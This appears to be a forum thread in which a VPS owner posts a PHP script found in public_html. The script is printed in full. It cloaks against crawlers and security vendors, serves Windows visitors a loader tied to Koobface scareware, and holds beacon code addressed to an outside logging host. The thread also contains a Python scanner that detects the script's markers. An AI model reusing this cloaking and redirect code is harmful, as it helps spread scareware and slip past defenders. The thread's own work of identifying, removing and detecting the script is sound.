I found a folder with this code on my VPS, any idea of what it's doing? I didn't put it there.

<?
error_reporting(0);
ini_set('display_errors', 0);
ini_set('error_reporting', 0);

$pic_fn = "4uo.jpg";
$swf_fn = "";
$js_fn  = "mmnsmy2mmg.php";

// Diagnostic hook: ?test=1 prints the script's tag and echoes the visitor's IP, UA and referer
if (isset($_GET['test']) && $_GET['test']==1) {
    print "KROTEG\n1291584844";
    if (is_file($js_fn)) {
        print "\njs_ok";
    } else {
        print "\njs_err";
    }
    print "\n".$_SERVER['REMOTE_ADDR']."|".$_SERVER['HTTP_USER_AGENT']."|".$_SERVER['HTTP_REFERER'];
    exit();
}
?>
<?
// Logging server and path for the (commented-out) llog.php beacons below
$ip_srv = "www.iranconsul.ae";
$dir = "/111";

$ip = $_SERVER["REMOTE_ADDR"];
$tmp = explode(".", $ip);
unset($tmp[3]);
unset($tmp[2]);
$net = trim(implode(".", $tmp));

function f_chars ($string) {
    $tmp = explode("h=", $string);
    $val = $tmp[count($tmp)-1];
    if (strlen($val) == 5) {
        return true;
    } else {
        return false;
    }
}

// Windows visitors: emit a page that loads the companion script mmnsmy2mmg.php, tagged by traffic source
function win(){
    global $js_fn;
    global $ip_srv, $dir;
    $path = $dir."/llog.php?filter=win&ip=".urlencode($_SERVER["REMOTE_ADDR"])."&ua=".urlencode($_SERVER["HTTP_USER_AGENT"])."&ref=".urlencode($_SERVER["HTTP_REFERER"])."&host=".urlencode($_SERVER["SERVER_NAME"]);
    //f_get_contents($ip_srv, $path);
    $param = "";
    if (isset($_REQUEST["ref"]) && $_REQUEST["ref"] == "ms") {
        $param = "ref=ms";
    } elseif (isset($_REQUEST["ref"]) && $_REQUEST["ref"] == "tw") {
        $param = "ref=tw";
    } else {
        if (!(strstr($_SERVER["HTTP_REFERER"], "myspace.com") === FALSE) || !(strstr($_SERVER["HTTP_REFERER"], "msplinks.com") === FALSE) || !(strstr($_SERVER["HTTP_REFERER"], "lnk.ms") === FALSE)) {
            $param = "ref=ms";
        } elseif (!(strstr($_SERVER["HTTP_REFERER"], "twitter.com") === FALSE)) {
            if (!(strstr($_SERVER["HTTP_REFERER"], "/status/") === FALSE)) {
                $param = "ref=ms";
            } else {
                $param = "ref=tw";
            }
        }
    }
    echo "<html><title>".rand()."</title><body><script src=".$js_fn."?".$param."></script></body></html>";
    exit;
}

// Suspected crawlers/scanners: serve the decoy file rss.html instead
function bot($reason = "unknown"){
    global $ip_srv, $dir;
    $path = $dir."/llog.php?filter=bot&ip=".urlencode($_SERVER["REMOTE_ADDR"])."&ua=".urlencode($_SERVER["HTTP_USER_AGENT"])."&ref=".urlencode($_SERVER["HTTP_REFERER"])."&reason=$reason"."&host=".urlencode($_SERVER["SERVER_NAME"]);
    //f_get_contents($ip_srv, $path);
    print file_get_contents("rss.html");
    exit;
}

// Everyone else: show a "Windows only" notice and redirect after 5 seconds
function other(){
    global $ip_srv, $dir;
    $path = $dir."/llog.php?filter=other&ip=".urlencode($_SERVER["REMOTE_ADDR"])."&ua=".urlencode($_SERVER["HTTP_USER_AGENT"])."&ref=".urlencode($_SERVER["HTTP_REFERER"])."&host=".urlencode($_SERVER["SERVER_NAME"]);
    //f_get_contents($ip_srv, $path);
    print "<h1 align=\"center\">This video is for Windows computers ONLY!</h1> <h2 align=\"center\">Redirecting... Please wait 5 seconds...</h2> <script type=\"text/javascript\"> function redirect () { ";
    print "window.location.href = \"http://adultfriendfinder.com/go/g1274694-pct+search\" ;";
    print " } setTimeout(\"redirect()\" , 5000); </script> ";
    exit;
}

// Minimal HTTP GET over a raw socket, used for the beacon calls (currently commented out)
function f_get_contents($domain, $path) {
    $out = "";
    $fp = @fsockopen($domain, 80, $errno, $errstr, 3);
    if ($fp) {
        $out = "GET ".$path." HTTP/1.0\r\n";
        $out .= "Host: ".$domain."\r\n";
        $out .= "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        while (!feof($fp)) {
            $out .= fgets($fp, 128);
        }
        fclose($fp);
        $tmp = explode("\r\n\r\n", $out);
        unset($tmp[0]);
        unset($tmp[1]);
        $out = implode("\r\n\r\n", $tmp);
        return $out;
    }
}

// network ranges ("setka" = network): search engines, social networks and security vendors, all treated as bots
$arr_mask = array(
    "65.52.0.0 - 65.55.255.255",       //microsoft
    "66.220.144.0 - 66.220.159.255",   //facebook
    "69.63.176.0 - 69.63.191.255",     //facebook
    "69.171.224.0 - 69.171.255.255",   //facebook
    /*
    "128.241.0.0 - 128.241.255.255",
    "130.94.0.0 - 130.94.255.255",
    "147.203.0.0 - 147.203.255.255",
    "165.234.0.0 - 165.234.255.255",
    "168.143.0.0 - 168.143.255.255",
    "198.172.0.0 - 198.172.255.255",
    "198.65.0.0 - 198.65.255.255",
    "205.212.0.0 - 205.212.255.255",
    "206.251.0.0 - 206.251.255.255",
    "206.71.0.0 - 206.71.255.255",
    "207.158.0.0 - 207.158.255.255",
    "207.195.0.0 - 207.195.255.255",
    "207.67.0.0 - 207.67.255.255",
    "209.59.0.0 - 209.59.255.255",
    */
    //GOOGLE
    "216.239.32.0 - 216.239.63.255",
    "64.233.160.0 - 64.233.191.255",
    "66.249.64.0 - 66.249.95.255",
    "72.14.192.0 - 72.14.255.255",
    "209.85.128.0 - 209.85.255.255",
    "173.194.0.0 - 173.194.255.255",
    "70.32.128.0 - 70.32.159.255",
    "74.125.0.0 - 74.125.255.255",
    "70.89.39.152 - 70.89.39.159",
    "70.90.219.72 - 70.90.219.79",
    "70.90.219.48 - 70.90.219.55",
    // bitly
    "184.72.0.0 - 184.73.255.255",
    "204.236.128.0 - 204.236.255.255",
    // proxy ?
    "188.165.197.0 - 188.165.197.255",
    //Motorola - Jakarta Commons-HttpClient/3.1
    "69.10.176.0 - 69.10.181.255",
    "192.55.31.0 - 192.55.31.255",
    //Yahoo
    "76.13.0.0 - 76.13.255.255",
    //Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1); Japan Network Information Center
    "150.70.64.0 - 150.70.75.255",
    //30-09-2010 8:46
    "192.35.222.0 - 192.35.222.255",
    "128.111.0.0 - 128.111.255.255",
    //msbots
    "204.16.32.0 - 204.16.35.255",
    "69.164.192.0 - 69.164.223.255",
    //Symantec
    "216.10.192.0 - 216.10.207.255",
    "117.193.0.0 - 117.193.255.255",
);

$ip_int = ip2long($ip);

//#######################
//bot("TEST");
//exit;
//#######################

foreach ($arr_mask as $el) {
    $mask = explode("-", $el);
    $start = ip2long(trim($mask[0]));
    $finish = ip2long(trim($mask[1]));
    if ($ip_int >= $start && $ip_int <= $finish) {
        bot("net");
    }
}

// User-agent / referer heuristics; each match hands off to bot() and exits
// empty referer and Windows
if($_SERVER["HTTP_REFERER"] == "" && !(strpos($_SERVER["HTTP_USER_AGENT"],"Windows") === false)) {bot("noref_n_win");}
// user_agent contains facebook
if (!(strpos($_SERVER["HTTP_USER_AGENT"],"facebook") === false)) {bot("ua_facebook");}
// bot in user_agent
if (!(strpos($_SERVER["HTTP_USER_AGENT"],"bot") === false)) {bot("ua_bot");}
// crawler in user_agent
if (!(strpos($_SERVER["HTTP_USER_AGENT"],"crawler") === false)) {bot("ua_crawler");}
// empty user_agent
if($_SERVER["HTTP_USER_AGENT"] == "") {bot("ua_null");}
// referer contains imgrefurl
if(strpos($_SERVER["HTTP_REFERER"], "imgrefurl")!== false) {bot("bad_ref");}
// short ua
if(strlen ($_SERVER["HTTP_USER_AGENT"]) < 55 ) {bot("ua_short");}
// user_agent Windows
if(!(strpos($_SERVER["HTTP_USER_AGENT"],"Windows") === false)) {win();}

other();
?>
<? exit(); ?>
<html>
<head>
<title>Hello</title>
</head>
<body>
hey rogazi
</body>
</html>
Some kind of proxying/exploiting script by the looks of it. I'm no expert; however, I suggest you have one look at it... However, I would be more concerned about how a script like that got there. What was the location of the script?
It is the KROTEG exploit. I strongly suggest you take it down as soon as possible and inspect your VPS for any leftovers (I'm pretty sure there will be a lot).
Thanks, I deleted it as soon as I found it. It was in public_html. I looked for any other files but did not find any more.
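Added example, not code from the thread or from whoever wrote the script: a small Python scanner that walks a web root (public_html, as in the reply above) and reports files carrying the fingerprints of the cloaker in the first post (the KROTEG test banner, the ip2long range filter, the Windows user-agent gate, the referer checks, the llog.php beacon path) plus the companion files that script references by name (mmnsmy2mmg.php, rss.html, 4uo.jpg). The indicator weights, the reporting threshold and the 1 MiB size cap are my own assumptions; the files it scans in the demo are constructed, trimmed to the marker lines rather than the whole script.

```python
#!/usr/bin/env python3
"""Scan a web root for files that look like the cloaking script from the first
post. Added example (not the thread's code); weights and threshold are assumptions."""
import re
import tempfile
from pathlib import Path

# Fingerprints taken from the posted script: (name, regex, weight).
INDICATORS = [
    ("kroteg_banner",   re.compile(r"KROTEG"), 5),
    ("errors_silenced", re.compile(r"error_reporting\s*\(\s*0\s*\)"), 1),
    ("test_backdoor",   re.compile(r"\$_GET\[\s*['\"]test['\"]\s*\]"), 2),
    ("ip_range_filter", re.compile(r"ip2long\s*\(\s*trim\s*\(\s*\$mask"), 3),
    ("ua_windows_gate", re.compile(r'HTTP_USER_AGENT"\]\s*,\s*"Windows"'), 2),
    ("referer_cloak",   re.compile(r"myspace\.com|msplinks\.com|lnk\.ms"), 2),
    ("llog_beacon",     re.compile(r"llog\.php\?filter="), 3),
]
# File names the script references; the two random-looking ones are strong on their own.
COMPANION_NAMES = {"mmnsmy2mmg.php": 5, "4uo.jpg": 5, "rss.html": 2}
THRESHOLD = 5         # assumed: weight sum needed before a file is reported
MAX_BYTES = 1 << 20   # assumed: skip content checks on files over 1 MiB


def score_source(text):
    """Return (score, [matched indicator names]) for one file's contents."""
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            score += weight
            hits.append(name)
    return score, hits


def scan_tree(root):
    """Return [(relative_path, score, hits)] for every file at or above THRESHOLD."""
    root = Path(root)
    findings = []
    for path in sorted((p for p in root.rglob("*") if p.is_file()), key=str):
        score, hits = 0, []
        if path.name in COMPANION_NAMES:
            score += COMPANION_NAMES[path.name]
            hits.append("companion_filename")
        if path.stat().st_size <= MAX_BYTES:
            content_score, content_hits = score_source(
                path.read_text(encoding="utf-8", errors="ignore"))
            score += content_score
            hits.extend(content_hits)
        if score >= THRESHOLD:
            findings.append((str(path.relative_to(root)), score, hits))
    return findings


# Constructed sample inputs for the demo: a few marker lines in the style of the
# posted script (not the whole thing) and a benign file that shares one weak marker.
SAMPLE_CLOAKER = r'''<? error_reporting(0);
if (isset($_GET['test']) && $_GET['test']==1) { print "KROTEG\n1291584844"; exit(); }
foreach ($arr_mask as $el) { $mask = explode("-", $el); $start = ip2long(trim($mask[0])); }
if (!(strpos($_SERVER["HTTP_USER_AGENT"],"Windows") === false)) {win();}
?>'''
SAMPLE_BENIGN = '<?php error_reporting(0); echo "hello"; ?>'


def demo():
    """Build a throwaway web root, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        bad_dir = root / "public_html" / "uploads" / "x"
        bad_dir.mkdir(parents=True)
        (root / "public_html" / "index.php").write_text(SAMPLE_BENIGN)
        (bad_dir / "index.php").write_text(SAMPLE_CLOAKER)
        (bad_dir / "mmnsmy2mmg.php").write_text("// stand-in for the loader the cloaker includes")
        return scan_tree(root)


if __name__ == "__main__":
    for rel, score, hits in demo():
        print(f"{score:3d}  {rel}  [{', '.join(hits)}]")
```

Run it as the account that owns the web root. A file reported only for its name is worth opening by hand, and a clean run does not prove the VPS is clean: the script shown is only the cloaker, so the loader it references (mmnsmy2mmg.php) and whatever dropped these files in the first place still need to be found.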
It's part of the Koobface virus; it distributes rogue anti-virus applications/scareware to scam people into purchasing "fake" anti-virus application licenses to remove fake infections. Read more here: http://r3v3rs3e.wordpress.com/2009/09/18/koobface-on-the-move-serving-scareware/